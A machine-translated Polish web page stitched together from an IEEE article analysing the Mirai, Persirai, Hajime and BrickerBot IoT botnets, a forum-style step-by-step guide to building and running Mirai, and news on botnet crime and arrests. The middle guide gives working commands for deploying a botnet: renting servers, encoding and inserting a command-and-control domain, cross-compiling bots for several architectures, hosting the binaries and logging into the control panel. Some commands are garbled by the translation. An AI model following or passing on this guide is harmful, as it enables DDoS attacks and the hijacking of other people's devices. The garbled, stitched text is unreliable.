Skąd pochodzi Mirai? Rozumiemy, jak działa botnet kamer wideo. Botnety Mirai i Gafgyt IoT atakują sektor korporacyjny. Co jeszcze wiadomo na temat tego trojana?

Wraz z rosnącą popularnością i skalą Internetu Rzeczy, jego urządzenia zaczęły być wykorzystywane przez atakujących jako platforma do organizowania najpotężniejszych cyberataków. Powaga i liczba głośnych incydentów związanych z bezpieczeństwem z udziałem takich urządzeń pokazały, że są one najsłabszym ogniwem w łańcuchu bezpieczeństwa nowoczesnych sieci komputerowych. Odpuść sobie moc obliczeniowa Większość tematów Internetu Rzeczy jest daleka od możliwości komputera PC, jego brak jest nadrabiany liczbą urządzeń połączonych w jedną całość. Wszystkie są stale podłączone do Sieci i często pracując w konfiguracji fabrycznej stają się łakomym kąskiem dla crackerów. Ogromna liczba, szeroka dystrybucja i słabe zabezpieczenia urządzeń IoT przyciągnęły już wielu napastników, którzy aktywnie wykorzystują je do przeprowadzania ataków DDoS.

„Przyszłość” już tu jest

Ostatnim dobrze znanym przykładem jest botnet Mirai (po japońsku „przyszłość”). Notatka. wyd.), odkryte po raz pierwszy w sierpniu 2016 r. przez zespół badawczy MalwareMustDie. Samo złośliwe oprogramowanie, a także jego liczne warianty i imitacje, stały się źródłem najpotężniejszych ataków DDoS w historii branży IT.

We wrześniu 2016 r. witryna internetowa konsultanta ds. bezpieczeństwa komputerowego Briana Krebsa zaczęła odbierać ruch z prędkością 620 Gb/s, czyli o rząd wielkości wyższy niż poziom, przy którym większość witryn ulega awarii. Mniej więcej w tym samym czasie jeszcze silniejszy atak Mirai DDoS (1,1 Tb/s) uderzył w OVH, francuskiego dostawcę usług hostingowych i chmurowych. Wkrótce opublikowano kod źródłowy szkodliwego oprogramowania, po czym osoby atakujące zaczęły na jego podstawie wypożyczać botnety zawierające do 400 000 urządzeń. Następnie nastąpiła seria ataków Mirai, z których najgłośniejszy, zorganizowany przeciwko dostawcy usług Dyn, w październiku 2016 r. spowodował wyłączenie na kilka godzin setek witryn, w tym Twittera, Netflix, Reddit i GitHub.

Mirai zwykle rozprzestrzenia się, infekując najpierw kamery internetowe, rejestratory DVR, routery itp., na których działa jedna wersja BusyBox. Następnie złośliwe oprogramowanie znajduje poświadczenia administracyjne innych urządzeń IoT po prostu metodą brute force, używając małego słownika par nazwa-hasło typowych dla producentów urządzeń sieciowych.

Następnie mutacje Mirai zaczęły pojawiać się dosłownie na co dzień, a fakt, że zachowały zdolność do reprodukcji i powodowania uszkodzeń przy użyciu tych samych metod, co oryginał, wskazuje na chroniczne zaniedbywanie producentów urządzeń IoT w zakresie najprostszych metod ochrony. Zaskakujące jest jednak to, że botnety utworzone z takich urządzeń otrzymały niewiele badań, pomimo niebezpieczeństwa, że coraz bardziej wyrafinowane ataki oparte na nich mogą podważyć całą infrastrukturę Internetu.

Jak działa Mirai

Mirai przeprowadza atak DDoS na serwery docelowe, aktywnie rozprzestrzeniając się za pośrednictwem urządzeń IoT o niezabezpieczonej konfiguracji.

Główne składniki

Botnet Mirai składa się z czterech głównych komponentów. Bot to złośliwe oprogramowanie, które infekuje urządzenia i rozprzestrzenia „infekcję” wśród źle skonfigurowanych urządzeń, a następnie atakuje serwer docelowy po otrzymaniu odpowiedniego polecenia od botmastera – osoby, która kontroluje boty. Serwer dowodzenia i kontroli zapewnia botmasterowi interfejs do sprawdzania stanu botnetu i inicjowania nowych ataków DDoS. Komunikacja między elementami infrastruktury botnetu odbywa się zwykle za pośrednictwem anonimowej sieci Tor. Program ładujący dystrybuuje pliki wykonywalne na wszystkie platformy sprzętowe (w sumie 18, w tym ARM, MIPS, x86 itd.) poprzez bezpośredni kontakt z nowymi ofiarami. Serwer raportowania utrzymuje bazę danych zawierającą informacje o wszystkich urządzeniach w botnecie, a nowo zainfekowane hosty zwykle komunikują się bezpośrednio z tym serwerem.

Schemat działania i komunikacji w botnecie

Mirai najpierw skanuje porty 23 i 2323 w poszukiwaniu losowych publicznych adresów IP. Niektóre adresy są wykluczone (prawdopodobnie po to, by nie zwracać uwagi agencji rządowych) – na przykład te należące do US Post Office, Pentagonu, IANA, a także General Electric i Hewlett-Packard. Na ryc. 1 przedstawia główne etapy aktywności i wymiany danych w botnecie.

Scena 1. Bot przeprowadza atak brute-force, wydobywając dane uwierzytelniające urządzeń IoT, które nie zostały zresetowane do ustawień fabrycznych. W słowniku Mirai są 62 możliwe pary nazwa użytkownika/hasło.

Etap 2. Po znalezieniu danych uwierzytelniających i użyciu ich w celu uzyskania dostępu do wiersz poleceń lub GUI urządzenia, bot przekazuje swoje cechy serwerowi raportów przez inny port.

Etap 3. Botmaster regularnie sprawdza potencjalne cele i aktualny stan botnetu, komunikując się z serwerem raportów za pośrednictwem Tora.

Etap 4. Po wybraniu podatnych urządzeń do zainfekowania, botmaster wydaje odpowiednie polecenia do downloadera ze wszystkimi niezbędnymi szczegółami, w tym adresami IP i informacjami o architekturze sprzętowej.

Etap 5. Downloader loguje się do podatnego urządzenia i zmusza je do pobrania i uruchomienia odpowiedniego pliku wykonywalnego złośliwego oprogramowania. Zwykle pobieranie odbywa się za pomocą narzędzia GNU Wget przy użyciu protokołu TFTP. Warto zauważyć, że po uruchomieniu szkodliwe oprogramowanie próbuje chronić się przed konkurencją, blokując porty, przez które często dochodzi do infekcji, w tym Telnet i SSH. Na tym etapie nowo utworzona instancja bota może już komunikować się z serwerem sterującym i odbierać od niego polecenia przeprowadzenia ataku. Robi to poprzez rozwiązanie nazwy domeny zakodowanej na sztywno w pliku wykonywalnym (domyślnie w Mirai jest cnc.changeme.com). Ta metoda, stosowana zamiast bezpośredniego dostępu do adresu IP, umożliwia botmasterowi zmianę adresów IP serwera sterującego bez modyfikowania plików binarnych i dodatkowej wymiany informacji.

Etap 6. Botmaster nakazuje wszystkim instancjom bota wykonanie ataku na serwer docelowy, przekazując odpowiednie parametry przez serwer Command and Control, w tym rodzaj i czas trwania ataku, a także adresy IP samego serwera i bota instancje.

Etap 7. Boty zaczynają atakować cel za pomocą jednej z kilkunastu dostępnych metod, w tym zalania za pomocą protokołów Generic Routing Encapsulation, TCP i HTTP.

Charakterystyka Mirai

W przeciwieństwie do innych podobnych złośliwych programów, Mirai nie próbuje uniknąć wykrycia. Prawie wszystkie etapy infekcji mają charakterystyczne cechy, które można rozpoznać za pomocą prostej analizy sieci: wyliczenie pewnych danych uwierzytelniających przez określone porty; wysyłanie niestandardowych raportów; ładowanie określonych plików binarnych; przesyłanie wiadomości w celu utrzymania połączenia; przekazywanie poleceń sterujących o charakterystycznej strukturze; prawie całkowity brak elementów losowych w ruchu ataku.

Na ryc. Rysunek 2 przedstawia standardowe tryby komunikacji między bootloaderem Mirai a urządzeniem IoT już zainfekowanym, ale jeszcze nie zaatakowanym. Czas trwania sesji jest różny, ale typy i rozmiary pakietów, a także sekwencja wiadomości są zgodne z wzorcami wskazującymi na infekcję tym konkretnym złośliwym oprogramowaniem.

warianty Mirai

Wydawałoby się, że publikacja kod źródłowy Mirai i jego stosunkowo głośny szum sieciowy powinny doprowadzić do szybkiego pojawienia się skutecznych mechanizmów rozpoznawania i ochrony. Tak się jednak nie stało: zaledwie dwa miesiące po wydaniu kodu źródłowego liczba instancji bota wzrosła ponad dwukrotnie, z 213 tys. do 493 tys., a także pojawiła się duża liczba jego odmian. Nawet ponad rok po odkryciu Mirai boty nadal używały słabych konfiguracji urządzeń tego samego typu, co pierwotnie.

Większość infekcji Mirai odbywa się przez porty TCP 23 lub 2323, ale w listopadzie 2016 r. znaleziono szczepy wirusa uzyskujące dostęp do innych portów, w tym 7547, z których korzystają dostawcy usług internetowych pilot routery klienckie. W tym samym miesiącu jeden z tych wariantów Mirai pozostawił prawie milion abonentów Deutsche Telekom bez dostępu do sieci.

W lutym 2017 r. przy użyciu wariantu Mirai przeprowadzono 54-godzinny atak DDoS na jedną z amerykańskich uczelni. W następnym miesiącu pojawił się kolejny wariant, tym razem z wbudowanymi urządzeniami do kopania bitcoinów, choć oszacowano, że wykorzystanie do tego celu urządzeń IoT raczej nie przyniesie dużych dochodów.

W kwietniu rozpoczęto działalność na Persirai, innym botnecie zbudowanym przy użyciu bazy kodu Mirai. Ta sieć zombie została wykryta przez badaczy Trend Micro, którzy nadali jej nazwę, łącząc słowa Persian i Mirai – pierwsze z nich zostało wybrane na podstawie rzekomego irańskiego pochodzenia szkodliwego oprogramowania. Próbuje uzyskać dostęp do interfejsu kontrolnego kamer internetowych niektórych producentów przez Port TCP 81. Jeśli się powiedzie, router jest penetrowany przy użyciu luki w protokole UPnP, a następnie pobierane, uruchamiane i usuwane są dodatkowe pliki binarne. Zamiast brutalnie wymuszać dane uwierzytelniające w celu wejścia do interfejsu aparatu, wirus wykorzystuje lukę zero-day, aby bezpośrednio pobrać plik z hasłami. Rozproszony atak DoS jest przeprowadzany przez zalewanie protokołu UDP. Według szacunków w sieci było około 120 000 urządzeń podatnych na Persirai.

Inne botnety IoT

Polegając na podstawowe zasady Mirai, twórcy nowego złośliwego oprogramowania, zaczęli wykorzystywać inne, bardziej wyrafinowane mechanizmy w celu zwiększenia mocy i maskowania aktywności sieci zombie.

W sierpniu 2016 r. badacze z MalwareMustDie poinformowali o pierwszym botnecie opartym na IoT zbudowanym przy użyciu języka skryptowego Lua. Większość armii botnetów składała się z modemów kablowych z procesorami ARM z systemem Linux. Szkodnik ma złożone funkcje - na przykład tworzy zaszyfrowany kanał wymiany danych z serwerem dowodzenia i kontroli oraz ustawia specjalne reguły iptables, aby chronić zainfekowane urządzenia przed konkurencją.

Botnet Hajime, wykryty w październiku 2016 r. przez Rapidity Networks, wykorzystuje metodę infekcji podobną do Mirai. Ale zamiast scentralizowanej architektury, Hajime opiera się na rozproszonym systemie komunikacyjnym, wykorzystując protokół BitTorrent Distributed Hash Tag (DHT) do wykrywania równorzędnych użytkowników (użytkowników sieci równorzędnej) i używa protokołu transportowego uTorrent do wymiany danych. Wszystkie wiadomości są szyfrowane przy użyciu protokołu RC4. Jak dotąd Hajime nie pokazał się w negatywny sposób, wręcz przeciwnie, eliminuje potencjalne źródła luk w urządzeniach IoT wykorzystywanych przez botnety, takie jak Mirai, w związku z czym sugerowano, że został stworzony przez jakiś rodzaj " Robin Hood". Jednak prawdziwy cel botnetu pozostaje tajemnicą.

Botnet BrickerBot, który podobnie jak Mirai infekuje oprogramowanie BusyBox, został wykryty przez ekspertów Radware w kwietniu 2017 roku. Wykorzystując domyślne dane uwierzytelniające ustawione w usłudze SSH, a także błędne konfiguracje i znane podatności, złośliwe oprogramowanie próbuje przeprowadzić ataki typu permanent denial of service (PDoS) na urządzenia IoT, czyli na tyle destrukcyjne, aby wymusić rekonfigurację lub wymianę sprzętu. BrickerBot psuje oprogramowanie sprzętowe urządzenia, usuwa znajdujące się na nim pliki i zmienia ustawienia sieciowe.

Lekcje

Ogromne szkody spowodowane atakami Mirai, jego wariantów i podobnych botnetów wyraźnie pokazały zagrożenia, jakie urządzenia IoT stwarzają dla sieci WWW. Dziś dość proste wirusy są w stanie przejąć kontrolę nad takimi urządzeniami i stworzyć ogromne niszczycielskie armie „zombi”. Jednocześnie atakujących przyciąga prostota powiększania populacji botów. Istnieje pięć głównych powodów, dla których urządzenia IoT są szczególnie przydatne do tworzenia botnetów.

Stała, nieskrępowana aktywność. W przeciwieństwie do laptopów i komputerów stacjonarnych, które często włączają się i wyłączają, wiele urządzeń IoT (takich jak kamery internetowe i routery Wi-Fi) działa przez całą dobę i często jest postrzegane przez hosty jako urządzenia, które nie mogą być podatne na infekcje.
Brak ochrony. W pędzie do wejścia na rynek IoT wielu producentów urządzeń zaniedbuje bezpieczeństwo na rzecz wygody i łatwości użytkowania.
Brak kontroli. Większość urządzeń IoT jest używanych na zasadzie „ustaw i zapomnij” – po początkowe ustawienia administratorzy mogą zwracać na nie uwagę tylko wtedy, gdy przestają regularnie działać.
Imponujący ruch ataku. Dzisiejsze urządzenia IoT są wystarczająco wydajne i dobrze ustawione, aby generować ruch ataków DDoS tak potężny, jak dzisiejsze komputery stacjonarne.
Nieinteraktywne lub minimalnie interaktywne interfejsy użytkownika. Ponieważ urządzenia IoT zazwyczaj wymagają minimalnej interwencji użytkownika, infekcja prawdopodobnie pozostanie niewykryta. Ale nawet jeśli zostanie to zauważone, użytkownicy nie są dostępni proste sposoby eliminacja złośliwego oprogramowania, z wyjątkiem fizycznej wymiany urządzenia.

Nadejście ataków DDoS przeprowadzanych przez urządzenia IoT było od dawna przewidywane, a dziś liczba coraz bardziej wyrafinowanych wariantów i naśladowców Mirai rośnie w alarmującym tempie. Takie złośliwe oprogramowanie zazwyczaj jest w stanie działać na wielu platformach i, charakteryzując się niskim zużyciem zasobów, może zadowolić się minimum pamięć o dostępie swobodnym. Ponadto procedura infekcji jest stosunkowo prosta, co sprawia, że każde podatne urządzenie jest kandydatem do przekształcenia w zombie, nawet jeśli jest często ponownie uruchamiane. Większość istniejących obecnie złośliwych programów IoT jest łatwa do wykrycia i przeanalizowania, ale nowe boty stają się coraz bardziej ukryte.

Zwykle większość odpowiedzialności za ataki DDoS spoczywa na samych użytkownikach i administratorach systemu, którzy zaniedbują elementarne środki ostrożności. Jednak w przypadku botnetów IoT cała odpowiedzialność spoczywa na producentach, którzy wytwarzają słabo chronione produkty z ustawieniami fabrycznymi. zdalny dostęp. Ponadto tylko producenci urządzeń IoT mają możliwość automatycznego dostarczania aktualizacje marki bezpieczeństwo, które pozwoliłoby chronić się przed infekcjami. Konwencjonalne ręczne metody zabezpieczeń, takie jak częste zmiany haseł, nie są możliwe w przypadku urządzeń IoT, ponieważ urządzenia IoT dokonują samoregulacji w sieci. Dlatego dzisiejszy Internet Rzeczy wymaga technicznych środków kontroli bezpieczeństwa, a także solidnych standardów bezpieczeństwa urządzeń, których muszą przestrzegać wszyscy dostawcy.

Geoffrey Voas ( [e-mail chroniony]) jest członkiem IEEE.

Constantinos Kolias, Georgios Kambourakis, Angelos Stavrou, Jefrey Voas, DDoS w IoT: Mirai i inne botnety. IEEE Computer, lipiec 2017, IEEE Computer Society. Wszelkie prawa zastrzeżone. Przedruk za zgodą.

Nie będę dużo sikał, powiem tylko, że oprogramowanie działa, z hukiem wyłącza strony. I to jest pierwsza rosyjska instrukcja instalacji Mirai. „Historyczne bzdury”

Będziemy potrzebować dwóch serwerów VPS KVM i domeny. Wirtualizacja to obecnie KVM, OpenVZ.
Na jednym serwerze zainstalujemy sam botnet, na drugim będziemy skanować boty. (bydlę)
Zabrałem serwery tutaj - https://www.nforce.com/
Nie było problemów, żadnych zakazów.
Dla tych, którzy chcą tylko zobaczyć, jak to jest i co, możesz wziąć serwery testowe tutaj - https://adminvps.ru/
WAŻNY. Serwery muszą być oparte na Debianie 8 i mieć co najmniej 1 GB pamięci RAM.
Dowolna domena, to nie ma znaczenia.
Przepraszam oczywiście, ale nie powiem ci, jak dołączyć domenę do VPS. To nie jest trudne, sam się dowiesz.
Łączymy się z naszym serwerem przez PuTTY i zaczynamy.

# apt-get update -y
# apt-get upgrade -y
# apt-get install unzip gcc golang ekran ogrodzenia elektrycznego sudo git -y
# apt-get install mysql-server -y
# apt-get install mysql-client -y
# apt-get install apache2 -y
Podczas instalacji MySQL będziesz musiał utworzyć hasło, aby uzyskać dostęp do MySQL dla użytkownika root. Wymyśl normalne hasło, bez „qwerty”
Zapisz to gdzieś, nadal będziemy go potrzebować.

# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y
#grzmotnąć< <(curl -s -S -L https://raw.githubusercontent.com/moovweb/gvm/master/binscripts/gvm-installer)
# gvm zainstaluj go1.4
# gvm użyj go1.4 [--default]
# gvm zainstaluj go1.4 -B
# gvm użyj go1.4
# eksportuj GOROOT_BOOTSTRAP=$GOROOT
# gvm zainstaluj go1.5
# gvm użyj go1.5
# gvm zainstaluj go1.8
# gvm użyj go1.8

Po zainstalowaniu wszystkich narzędzi pobierz kod źródłowy bota - i prześlij go na serwer. Za pomocą polecenia wget lub po prostu za pomocą programu WinSCP.
# rozpakuj kod źródłowy Mirai-master.zip
# cd Mirai-Source-Code-Master/mirai/tools
# gcc enc.c -o enc
# ./enc string vlmi.su (piszemy naszą domenę, która jest podłączona do serwera) i naciskamy Enter
Tutaj zobaczysz następujący tekst -
XOR"ing 14 bajtów danych...
\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22
14 - tutaj będziesz miał inny numer, więc nie martw się, wszystko się zgadza.
Skopiuj cały ten tekst.
Edytor nano otwieramy przez edytor nano lub przez WinSCP plik table.c znajdujący się w folderze mirai / bot
Musisz to zobaczyć - https://prnt.sc/gcxa2m
Linia add_entry (TABLE_CNC_DOMAIN - zmieniamy wszystko w cudzysłowie na nasz tekst, który właśnie skopiowaliśmy. Zamiast " 30 " piszemy nasz numer, który również właśnie skopiowaliśmy. To samo robimy z linią add_entry (TABLE_SCAN_CB_DOMAIN
Zapisz i zamknij edytor.
Pójść dalej.
Otwórz plik mirai/cnc/main.go w edytorze
Widzimy to - https://prnt.sc/gcxdtz
„127.0.0.1” zmienia się na „127.0.0.1:3306”
"hasło" zostaje zmienione na nasze hasło MySQL, które zostało wprowadzone wcześniej. "
Zapisz plik i zamknij edytor.
Po prostu skopiuj wszystkie te śmieci, nie powiem ci, dlaczego są potrzebne -

# mkdir /etc/xcompile
# cd /etc/xcompile

# tar -jxf cross-compiler-armv4l.tar.bz2
# tar -jxf cross-compiler-i586.tar.bz2
# tar -jxf cross-compiler-m68k.tar.bz2
# tar -jxf cross-compiler-mips.tar.bz2
# tar -jxf cross-compiler-mipsel.tar.bz2
# tar -jxf cross-compiler-powerpc.tar.bz2
# tar -jxf cross-compiler-sh4.tar.bz2
# tar -jxf cross-compiler-sparc.tar.bz2
# tar -jxf cross-compiler-armv6l.tar.bz2

# mv cross-compiler-armv4l armv4l
# mv cross-compiler-i586 i586
# mv cross-compiler-m68k m68k
# mv cross-compiler-mips mips
# mv cross-compiler-mipsel mipsel
# mv cross-compiler-powerpc powerpc
# mv cross-compiler-sh4 sh4
# mv cross-compiler-sparc sparc
# mv cross-compiler-armv6l armv6l

# export PATH=$PATH:/etc/xcompile/armv4l/bin

# export PATH=$PATH:/etc/xcompile/i586/bin
# export PATH=$PATH:/etc/xcompile/m68k/bin
# export PATH=$PATH:/etc/xcompile/mips/bin
# export PATH=$PATH:/etc/xcompile/mipsel/bin
# export PATH=$PATH:/etc/xcompile/powerpc/bin
# export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
# export PATH=$PATH:/etc/xcompile/sh4/bin
# export PATH=$PATH:/etc/xcompile/sparc/bin
# export PATH=$PATH:/etc/xcompile/armv6l/bin

# export PATH=$PATH:/usr/local/go/bin
# eksportuj GOPATH=$HOME/Dokumenty/go

# wejdź na github.com/go-sql-driver/mysql
# wejdź na github.com/mattn/go-shellwords
Popieprzone.

# cd Mirai-Source-Code-master/mirai
# ./build.sh debugowanie telnet
# ./build.sh wydanie telnet

# mv mirai* /var/www/html
# cd /var/www/html
# kosze mkdir
#mv*pojemniki/
#Płyta CD

Teraz MySQL.
# mysql -u root -p
Tutaj zostaniesz poproszony o podanie hasła. Wprowadź wcześniej ustawione hasło.
# tworzenie bazy danych Mirai;
#użyj mirai
Teraz skopiuj cały tekst stąd - wklej https://pastebin.com/QVD48J8s i naciśnij Enter.
Skopiuj tekst stąd - https://pastebin.com/JwYSgE4v
Zamiast anna-senpai piszemy nasz login. Każdy. To samo z moim superhasłem. Będziemy potrzebować tych danych, aby uzyskać dostęp do panelu sterowania bota.
Powinno być tak - INSERT INTO users VALUES (NULL, "pizdec", "zaebalsjapisatj", 0, 0, 0, 0, -1, 1, 30, "");
Kopiuj, wklej, naciśnij Enter.
Teraz możesz wyjść.
#Wyjście
Prawie wszystko.
# cd Mirai-Source-Code-master/mirai/release
# touch prompt.txt
# ekran ./cnc
Powinieneś zobaczyć otwartą bazę danych MySQL
Nie zamykaj tej sesji, otwórz nową.
http://prntscr.com/gcxunx zamiast vlmi.su piszemy naszą domenę i klikamy Otwórz.
Wpisz swoją nazwę użytkownika i hasło, w moim przypadku jest to -
pizdec
zaebalsjapisatj
Wszystko, jesteśmy w panelu sterowania bota.

Zasadniczo Mirai działa po prostu: skanuje Internet w poszukiwaniu urządzeń IoT, które są podatne na brutalną siłę i włamania, dostępne przez telnet. Złośliwe oprogramowanie infekuje przede wszystkim kamery monitorujące, rejestratory DVR i routery, a następnie rozmnaża się jak robak.

Z ataków DDoS przeprowadzonych przez ten botnet w ostatnim czasie i największych w Europie. Szczytowa moc ataku osiągnęła 620 Gb/s i ponad 1 Tb/s. Aby osiągnąć takie wyniki, osoby atakujące wykorzystały powodzi UDP, DNS i HTTP, a także pakiety GRE (Generic Routing Encapsulation), które eksperci uznali za bardzo nietypowe.

Wnioski ekspertów MalwareTech generalnie zgadzają się z tymi obserwacjami. Tak więc w ciągu dwunastu godzin naukowcy zarejestrowali około 72 000 unikalnych adresów IP, a co godzinę pojawiało się 4000 nowych adresów IP. Na tej podstawie analitycy doszli do wniosku, że rozmiar botnetu jest bardzo skromny - tylko około 120 000 urządzeń dziennie. I chociaż botnet jest znacznie większy, a liczby to 1-1,5 miliona botów, ani badacze MalwareTech, ani specjaliści z Akamai nie zgadzają się z tym.

„Mirai, który w przeszłości był w dużej mierze ignorowany ze względu na prostotę ataków telnetowych, stał się w zeszłym tygodniu niemal głównym tematem dyskusji w mediach na całym świecie, a organy ścigania wszczęły dochodzenia przy wsparciu wielu międzynarodowych firm” piszą naukowcy. „Jest bardzo prawdopodobne, że potężne ataki DDoS staną się teraz bardziej powszechne, ponieważ hakerzy znajdą coraz bardziej podatne na ataki urządzenia IoT lub zaczną infekować urządzenia chronione przez NAT. Zdecydowanie nadszedł czas, aby producenci przestali wypuszczać urządzenia z globalnymi domyślnymi hasłami i przeszli na wypuszczanie urządzeń z losowo generowanymi hasłami na spodzie obudowy”.

Oprócz raportu, badacze MalwareTech załączyli film przedstawiający mapę infekcji Mirai (patrz poniżej). Również na stronie internetowej badaczy można znaleźć interaktywną mapę botnetu, która jest aktualizowana w czasie rzeczywistym.

Ataki botnetu Mirai na amerykańskiego dostawcę DNS Dyn w 2016 r. wywołały szeroki rezonans i zwróciły większą uwagę na botnety. Jednak w porównaniu z tym, jak współcześni cyberprzestępcy wykorzystują dziś botnety, ataki na Dyn mogą wydawać się dziecinnymi żartami. Przestępcy szybko nauczyli się wykorzystywać botnety do uruchamiania zaawansowanego szkodliwego oprogramowania, które pozwala im tworzyć całe infrastruktury zainfekowanych komputerów i innych urządzeń z dostępem do Internetu w celu generowania nielegalnych zysków na masową skalę.

W ostatnich latach organy ścigania poczyniły pewne postępy w zwalczaniu działalności przestępczej związanej z botnetami, ale jak dotąd wysiłki te z pewnością nie wystarczą, aby dokonać wystarczającego naruszenia bezpieczeństwa botnetów prowadzonych przez cyberprzestępców. Oto kilka znanych przykładów:

Amerykański Departament Sprawiedliwości oskarżył dwóch młodych mężczyzn o ich rolę w rozwoju i działaniu botnetu Mirai: Paras Jha, 21 lat, i Josiah White, 20 lat. Są oskarżani o organizowanie i przeprowadzanie ataków DDoS na firmy, a następnie żądanie okupu za ich powstrzymanie, a także sprzedaż „usług” tym firmom, aby zapobiec podobnym atakom w przyszłości.
Władze hiszpańskie w ramach operacji transgranicznej na wniosek Stanów Zjednoczonych aresztowały mieszkańca Petersburga Petera Lewaszowa, znanego w kręgach cyberprzestępczych jako Peter Severa. Prowadził Kelihos, jeden z najdłużej działających botnetów w Internecie, który, jak się szacuje, zainfekował około 100 000 komputerów. Oprócz wymuszeń Petr Lewaszow aktywnie wykorzystywał Kelihos do organizowania wysyłek spamowych, naliczając 200-500 USD za milion wiadomości.
W zeszłym roku aresztowano dwóch izraelskich nastolatków pod zarzutem organizowania ataków DDoS w zamian za nagrody. Para zarobiła około 600 000 dolarów i przeprowadziła około 150 000 ataków DDoS.

Botnety to sieci komputerowe składające się z dużej liczby komputerów lub innych urządzeń podłączonych do Internetu, na których bez wiedzy ich właścicieli pobierane i uruchamiane jest autonomiczne oprogramowanie - boty. Co ciekawe, same boty zostały pierwotnie opracowane jako narzędzia programowe do automatyzacji powtarzalnych i powtarzalnych zadań, które nie są kryminalne. Jak na ironię, jeden z pierwszych botów, który odniósł sukces, znany jako Eggdrop i stworzony w 1993 roku, został zaprojektowany do kontrolowania i ochrony kanałów IRC (Internet Relay Chat) przed próbami przejęcia nad nimi kontroli przez osoby trzecie. Jednak elementy przestępcze szybko nauczyły się wykorzystywać moc botnetów, używając ich jako globalnych, prawie automatycznych systemów przynoszących zyski.

W tym czasie złośliwe oprogramowanie botnetowe znacznie się rozwinęło i może teraz wykorzystywać różne metody ataków, które odbywają się jednocześnie w kilku kierunkach. Ponadto „gospodarka botów” z punktu widzenia cyberprzestępców wygląda niezwykle atrakcyjnie. Przede wszystkim nie ma praktycznie żadnych kosztów infrastruktury, ponieważ zhakowane komputery i inny sprzęt z dostępem do Internetu są wykorzystywane do organizowania sieci zainfekowanych maszyn, oczywiście bez wiedzy właścicieli tych urządzeń. Ta wolność od inwestycji w infrastrukturę oznacza, że zyski przestępców będą praktycznie równe ich dochodom z nielegalnej działalności. Oprócz możliwości korzystania z takiej „dochodowej” infrastruktury, anonimowość jest również niezwykle ważna dla cyberprzestępców. Aby to zrobić, używają głównie „niemożliwych do wyśledzenia” kryptowalut, takich jak Bitcoin, gdy żądają okupu. Z tych powodów botnety stały się preferowaną platformą cyberprzestępczości.

Z punktu widzenia wdrażania różnych modeli biznesowych botnety są doskonałą platformą do uruchamiania różnych złośliwych funkcjonalności, które przynoszą cyberprzestępcom nielegalne dochody:

Szybka i powszechna dystrybucja wiadomości e-mail zawierających oprogramowanie ransomware żądające okupu.
Jako platforma do likwidacji liczby kliknięć w link.
Otwarcie serwerów proxy dla anonimowego dostępu do Internetu.
Implementacja prób włamania się do innych systemów internetowych za pomocą wyszukiwania brute-force (lub „brute force”).
Przeprowadzanie masowych wysyłek e-maili i hostowanie fałszywych stron w przypadku phishingu na dużą skalę.
Wycofanie kluczy CD lub innych danych licencyjnych do oprogramowania.
Kradzież danych osobowych.
Uzyskiwanie informacji o karcie kredytowej i innych kontach bankowych, w tym kodów PIN lub „tajnych” haseł.
Zainstaluj keyloggery, aby przechwytywać wszystkie dane, które użytkownik wprowadza do systemu.

Jak stworzyć botnet?

Ważnym czynnikiem wpływającym na popularność wykorzystywania botnetów wśród cyberprzestępców jest względna łatwość, z jaką różne komponenty szkodliwego oprogramowania mogą być montowane, modyfikowane i ulepszane. Okazja do szybkiego stworzenia botnetu pojawiła się już w 2015 roku, gdy publicznie udostępniono kody źródłowe LizardStresser, zestawu narzędzi do przeprowadzania ataków DDoS, stworzonego przez znaną grupę hakerską Lizard Squad. Dzisiaj każdy uczeń może pobrać botnet do przeprowadzania ataków DDOS (co już robi, według publikacji prasowych na całym świecie).

Łatwy do pobrania i łatwy w użyciu kod LizardStresser zawiera kilka wyrafinowanych metod przeprowadzania ataków DDoS: utrzymywanie otwartych połączeń TCP, wysyłanie losowych niechcianych ciągów do portu TCP lub portu UDP lub ponowne wysyłanie pakietów TCP z określonymi wartościami flag. Szkodnik zawierał również mechanizm losowego uruchamiania poleceń powłoki, co jest niezwykle przydatne do pobierania zaktualizowanych wersji LizardStressera z nowymi poleceniami i zaktualizowaną listą monitorowanych urządzeń, a także do instalowania innego złośliwego oprogramowania na zainfekowanym urządzeniu. Od tego czasu opublikowano kody źródłowe innego złośliwego oprogramowania służącego do organizowania i kontrolowania botnetów, w tym przede wszystkim oprogramowania Mirai, co radykalnie zmniejsza „barierę high-tech” dla działalności przestępczej, jednocześnie zwiększając możliwości zysku i elastyczność w korzystanie z botnetów.

Jak Internet rzeczy (IoT) stał się Klondike do tworzenia botnetów

Jeśli chodzi o liczbę zainfekowanych urządzeń i ruch generowany podczas ataków, masowe wykorzystanie niezabezpieczonych urządzeń IoT wywołało eksplozję, prowadząc do pojawienia się botnetów na niespotykaną dotąd skalę. Tak więc na przykład latem 2016 roku, przed i bezpośrednio podczas Igrzysk Olimpijskich w Rio de Janeiro, jeden z botnetów stworzonych na podstawie kodu programu LizardStresser wykorzystywał głównie około 10 tysięcy zainfekowanych urządzeń IoT (głównie kamer internetowych). do przeprowadzania wielokrotnych i długotrwałych ataków DDoS ze stałą mocą przekraczającą 400 Gb/s, osiągając wartość szczytową 540 Gb/s. Zauważamy również, że według szacunków pierwotny botnet Mirai był w stanie skompromitować około 500 tysięcy urządzeń IoT na całym świecie.

Chociaż wielu dostawców wprowadziło pewne zmiany od czasu tych ataków, większość urządzeń IoT nadal jest dostarczana z domyślnymi ustawieniami nazwy użytkownika i hasła lub ze znanymi lukami w zabezpieczeniach. Ponadto, aby zaoszczędzić czas i pieniądze, niektórzy producenci okresowo duplikują sprzęt i oprogramowanie używane w różnych klasach urządzeń. W rezultacie domyślne hasła używane do sterowania oryginalnym urządzeniem można zastosować do wielu zupełnie różnych urządzeń. W ten sposób wdrożono już miliardy niezabezpieczonych urządzeń IoT. I pomimo tego, że przewidywany wzrost ich liczby zwolnił (choć nieznacznie), oczekiwany wzrost globalnej floty „potencjalnie niebezpiecznych” urządzeń IoT w przewidywalnej przyszłości nie może nie szokować (patrz wykres poniżej).

Wiele urządzeń IoT doskonale nadaje się do nieautoryzowanego użycia w ramach przestępczych botnetów, ponieważ:

W większości są one niezarządzane, innymi słowy działają bez odpowiedniej kontroli ze strony administratora systemu, co sprawia, że ich użycie jako anonimowych serwerów proxy jest niezwykle efektywne.
Są one zazwyczaj dostępne online 24x7, co oznacza, że są dostępne dla ataków o każdej porze i z reguły bez żadnych ograniczeń przepustowości czy filtrowania ruchu.
